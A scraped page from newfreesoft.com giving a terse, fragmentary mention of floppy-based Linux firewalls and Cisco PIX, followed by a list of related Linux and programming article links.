Floppyfw a static router has a firewall, as long as you can boot a 1.44M floppy disk and install the 2.2 kernel
Configure firewall.
linux router project another single floppy router / firewall
Business Firewall
cisco pix
To-date version of your program
- Linux security settings Notes (Linux)
- Linux environment variable settings and save places (Linux)
- Linux environment RabbitMQ installation and monitoring of plug-in installation (Linux)
- How to find an IP address through the command line (Linux)
- CoreOS use register mirror to build private warehouse (Linux)
- Browser caching mechanism on the analysis (Linux)
- Qt for file splitting and fusion gadgets (Programming)
- 24 Docker recommendations (Linux)
- How to fix fatal error: security / pam_modules.h: No such file or directory (Linux)
- MySQL binary packages install for RedHat Linux Enterprise 6.4 (Database)
- After installing minimize RHEL / CentOS 7 need to do some things (Linux)
- To convert into a binary search tree sorted doubly linked list (Programming)
- C ++: Postmodern systems programming language (Programming)
- Linux RHCS basic maintenance commands (Linux)
- MogileFS system installation configuration example (Server)
- Composition and dynamic memory allocation C program (Programming)
- RedHat 6.5 installation and deployment Openfire (Server)
- Bad name two variables (Linux)
- Analysis examples: Intrusion Response Linux platform Case (Linux)
- Install the Red Hat Container Development Kit on OSX (Server)
  CopyRight 2002-2022 newfreesoft.com, All Rights Reserved.